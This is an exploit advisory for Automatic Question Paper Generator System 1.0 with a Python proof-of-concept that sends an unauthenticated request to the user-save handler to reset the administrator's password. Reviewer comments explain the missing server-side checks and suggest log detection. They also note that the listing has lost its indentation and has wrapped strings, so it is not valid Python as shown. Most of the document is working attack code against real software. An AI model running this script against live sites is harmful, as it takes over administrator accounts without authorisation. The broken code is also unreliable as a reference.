Automatic Question Paper Generator System 1.0 Insecure Direct Object Reference

Automatic Question Paper Generator System version 1.0 suffers from an insecure direct object reference vulnerability: the user-save request takes the target account's id from the client, which allows an attacker to reset the password of other users.


MD5 | 233bb5192c00cb509cec2fd98ea837f5

# Exploit Title: Automatic Question Paper Generator System 1.0 - Authentication Bypass
# Date: 2022-04-03
# Exploit Author: Mr Empy
# Software Link: https://www.sourcecodester.com/php/15190/automatic-question-paper-generator-system-phpoop-free-source-code.html
# Version: 1.0
# Tested on: Linux
#!/usr/bin/env python3
import requests
import random
import string
from requests_toolbelt import MultipartEncoder
from time import sleep
import argparse

def banner():
    """Print the proof-of-concept's ASCII-art title block to stdout."""
    # Raw string: the art contains backslashes that are not escape sequences,
    # so the printed text is the same as with the plain literal.
    title_block = r'''
___ ____ ____ ______
/ | / __ \ / __ \/ ____/
/ /| |/ / / / / /_/ / / __
/ ___ / /_/ / / ____/ /_/ /
/_/ |_\___\_\/_/ \____/

[Automatic Question Paper Generator v1.0]
[Authentication Bypass]
'''
    print(title_block)

# Proof-of-concept request for the advisory above: submits a profile update
# for the account with id "1", carrying a caller-chosen password, to the
# application's user-save handler (classes/Users.php?f=save).
# NOTE(review): this listing lost its indentation and several statements are
# wrapped mid-expression or mid-string, so it is not valid Python as shown.
def main():
# Form fields sent to the handler. The record to overwrite is selected purely
# by the client-supplied 'id'; nothing else in the request ties it to the
# caller. `arguments` is the module-level argparse result, read as a global.
fields = {
'id': "1",
'firstname': 'Adminstrator',
'lastname': 'Admin',
'username': 'admin',
'password': arguments.newpassword
}

# Multipart boundary: fixed 'WebKitFormBoundary' prefix plus 16 characters
# drawn by random.sample (so no character repeats) from letters and digits.
boundary = '----WebKitFormBoundary' +
''.join(random.sample(string.ascii_letters + string.digits, 16))
m = MultipartEncoder(fields=fields, boundary=boundary)

# Only Connection and Content-Type are set: no cookie, token or Authorization
# header is attached, so the request carries no session at all.
# Defensive takeaway: the save handler presumably neither requires a
# logged-in session nor checks that the session owner may edit the submitted
# id — both checks belong on the server side (confirm against Users.php).
headers = {
"Connection": "keep-alive",
"Content-Type": m.content_type
}

# Detection: requests to this path that arrive without an authenticated
# session are worth alerting on in web-server logs.
r = requests.post(f'{arguments.url}/classes/Users.php?f=save',
headers=headers, data=m)
# NOTE(review): this is a loose success test — any response body containing
# the character "1" matches, so a positive result does not by itself confirm
# that a host is affected.
if '1' in r.text:
print(f'[+] Account taken successfully! Login:
admin:{arguments.newpassword}')
else:
print('[-] Not vulnerable')

# Script entry point: parse the command line, print the banner, pause two
# seconds, then run main().
# NOTE(review): `arguments` is assigned here at module level and read as a
# global inside main(), so main() only works when the file runs as a script.
# NOTE(review): both help strings below are wrapped mid-literal in this
# listing; the original spacing at the wrap points cannot be recovered.
if __name__ == '__main__':
parser = argparse.ArgumentParser()
# Base URL of the installation under test (required).
parser.add_argument('-u','--url', action='store', help='Target URL (
http://target.com/aqpg/)', dest='url', required=True)
# Value that main() submits in the 'password' form field (required).
parser.add_argument('-p','--password', action='store', help='New
password', dest='newpassword', required=True)
arguments = parser.parse_args()
banner()
sleep(2)
main()
